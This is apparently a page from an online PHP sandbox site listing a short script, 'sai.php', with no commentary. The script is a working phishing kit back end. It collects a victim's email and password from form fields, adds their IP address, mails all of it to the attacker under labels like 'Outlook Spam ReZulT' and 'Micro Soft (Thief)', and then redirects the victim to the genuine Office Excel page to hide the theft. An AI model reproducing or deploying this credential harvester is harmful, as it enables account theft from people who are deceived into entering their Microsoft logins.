sai - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of sai.php

  1. <?
  2.  
  3. $ip = getenv("REMOTE_ADDR");
  4. $message .= "--------------Outlook Spam ReZulT O5---------------------\n";
  5. $message .= "Email ID : ".$_POST["feedback"]."\n";
  6. $message .= "Password : ".$_POST["feedbacknow"]."\n";
  7. $message .= "IP: ".$ip."\n";
  8. $message .= "---------------Created By Terry Dantata--------------------------\n";
  9.  
  10. $recipient = "[email protected]";
  11. $do = "mail";
  12. $subject = "DANTATA Result";
  13. $headers = "From";
  14. $headers .= $_POST['eMailAdd']."\n";
  15. $headers .= "MIME-Version: 1.0\n";
  16. $do($er,$subject,$message,$headers);
  17.          mail("$cc", "Micro Soft (Thief)", $message);
  18. if (mail($recipient,$subject,$message,$headers))
  19.            {
  20.                    header("Location:https://office.live.com/start/Excel.aspx");
  21.  
  22.            }
  23. else
  24.                {
  25.                echo "ERROR! Please go back and try again.";
  26.          }
  27.  
  28. ?>
  29.  
File Description
  • sai
  • PHP Code
  • 15 Sep-2021
  • 810 Bytes
You can Share it: